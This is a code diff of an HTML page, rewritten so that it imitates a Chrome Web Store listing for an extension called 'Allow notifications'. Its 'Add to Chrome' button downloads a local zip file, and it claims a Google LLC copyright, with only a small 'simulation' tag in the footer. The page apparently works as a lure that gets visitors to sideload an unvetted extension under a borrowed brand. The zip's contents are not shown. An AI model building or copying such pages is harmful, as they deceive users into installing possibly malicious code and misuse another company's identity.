--- a/index.html
+++ b/index.html
@@ -1,133 +1,99 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>Allow notifications for messages - Chrome Extension</title>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <title>Allow notifications - Chrome Web Store</title>
+  <link rel="icon" href="icon.png" />
   <style>
-    * {
+    body {
+      font-family: 'Roboto', sans-serif;
+      background-color: #f1f3f4;
       margin: 0;
       padding: 0;
-      box-sizing: border-box;
     }
-
-    body {
-      font-family: Arial, sans-serif;
-      background-color: #fff;
-      height: 100vh;
-      width: 100vw;
-    }
-
-    .container {
-      max-width: 1000px;
+    .main {
+      max-width: 980px;
       margin: auto;
-      padding: 40px 20px;
+      background-color: white;
+      padding: 30px;
+      margin-top: 40px;
+      border-radius: 8px;
+      box-shadow: 0 1px 3px rgba(0,0,0,0.1);
     }
-
     .header {
       display: flex;
-      justify-content: space-between;
       align-items: center;
-      flex-wrap: wrap;
     }
-
-    .info {
-      flex: 1;
-      margin-left: 20px;
-    }
-
-    .info h1 {
-      font-size: 28px;
-      margin-bottom: 10px;
-    }
-
-    .info p {
-      color: #555;
-      line-height: 1.5;
-    }
-
     .icon {
-      width: 120px;
-      height: 120px;
-      border-radius: 20px;
+      width: 100px;
+      height: 100px;
+      margin-right: 20px;
+      border-radius: 20%;
     }
-
-    .add-button {
+    .details h1 {
+      font-size: 24px;
+      margin: 0;
+    }
+    .details p {
+      margin: 6px 0;
+      color: #555;
+    }
+    .install-button {
       background-color: #1a73e8;
       color: white;
       border: none;
       padding: 12px 24px;
-      border-radius: 6px;
-      font-size: 16px;
+      border-radius: 4px;
+      font-size: 14px;
       cursor: pointer;
-      margin-top: 20px;
-      box-shadow: 0 2px 5px rgba(0,0,0,0.1);
-      transition: background-color 0.2s ease;
+      margin-top: 15px;
     }
-
-    .add-button:hover {
-      background-color: #1669c1;
+    .install-button:hover {
+      background-color: #155fc1;
     }
-
-    .previews {
-      margin-top: 50px;
+    .screenshots {
+      margin-top: 40px;
       display: flex;
-      justify-content: center;
-      gap: 30px;
+      gap: 20px;
       flex-wrap: wrap;
     }
-
-    .previews img {
-      width: 450px;
-      max-width: 100%;
-      border-radius: 12px;
-      box-shadow: 0 0 12px rgba(0,0,0,0.1);
-      transition: transform 0.2s ease;
+    .screenshots img {
+      width: 300px;
+      border-radius: 8px;
+      box-shadow: 0 1px 4px rgba(0,0,0,0.1);
     }
-
-    .previews img:hover {
-      transform: scale(1.03);
-    }
-
-    @media (max-width: 768px) {
-      .header {
-        flex-direction: column;
-        align-items: center;
-        text-align: center;
-      }
-
-      .info {
-        margin-left: 0;
-      }
-
-      .previews {
-        flex-direction: column;
-        gap: 20px;
-      }
-
-      .previews img {
-        width: 90%;
-      }
+    .footer {
+      text-align: center;
+      font-size: 12px;
+      color: #888;
+      margin-top: 60px;
+      margin-bottom: 20px;
     }
   </style>
 </head>
 <body>
 
-  <div class="container">
+  <div class="main">
     <div class="header">
-      <img src="icon.png" alt="Extension Icon" class="icon">
-      <div class="info">
-        <h1>Allow notifications for messages</h1>
-        <p>The official Chrome extension for receiving message alerts from the Crypto Exchanger PHP script.</p>
+      <img src="icon.png" class="icon" alt="Extension Icon" />
+      <div class="details">
+        <h1>Allow notifications</h1>
+        <p>Provided by Allownotfications.dev</p>
         <a href="Allow-notifications.zip" download>
-          <button class="add-button">Add to Chrome</button>
+          <button class="install-button">Add to Chrome</button>
         </a>
       </div>
     </div>
 
-    <div class="previews">
-      <img src="preview1.png" alt="Preview 1">
-      <img src="preview2.png" alt="Preview 2">
+    <div class="screenshots">
+      <img src="preview1.png" alt="Screenshot 1" />
+      <img src="preview2.png" alt="Screenshot 2" />
     </div>
+  </div>
+
+  <div class="footer">
+    © 2025 Google LLC - Chrome Web Store (simulation)
   </div>
 
 </body>
